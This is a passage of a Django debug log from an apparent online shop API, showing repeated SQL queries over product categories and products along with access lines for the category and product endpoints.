"shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:26:30,568 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:26:30] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:26:33,034 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-18 09:26:33,038 utils 4252 140031747061504 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:26:33,043 utils 4252 140031721535232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:26:33,052 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [18/Dec/2019 09:26:33] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-18 09:26:33,059 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:26:33,063 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:26:33,069 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:26:33,073 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:26:33,077 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:26:33,081 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:26:33,086 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:26:33,092 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:26:33,096 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:26:33,100 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:26:33,105 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:26:33,109 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:26:33,115 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:26:33,119 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:26:33,124 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:26:33,128 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:26:33,132 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:26:33,138 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:26:33,142 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:26:33,146 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:26:33,150 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:26:33,154 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:26:33,158 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:26:33,164 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:26:33,168 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:26:33,172 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:26:33,176 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:26:33,180 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:26:33,185 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:26:33,189 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:26:33,193 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:26:33,197 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:26:33,201 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:26:33,208 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:26:33,212 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:26:33,216 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:26:33,219 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:26:33,224 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:26:33,228 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:26:33,232 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:26:33,236 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:26:33,240 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:26:33,245 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:26:33,249 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:26:33] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:26:35,854 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:26:35,858 utils 4252 140031747061504 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:26:35] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 09:26:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-18 09:26:58,993 utils 4252 140031747061504 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:26:59,000 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:26:59,004 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:26:59,007 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:26:59,010 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:26:59,013 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:26:59,015 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:26:59,017 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:26:59,020 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:26:59,023 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:26:59,026 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:26:59,028 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:26:59,030 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:26:59,033 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:26:59,036 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:26:59,038 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY 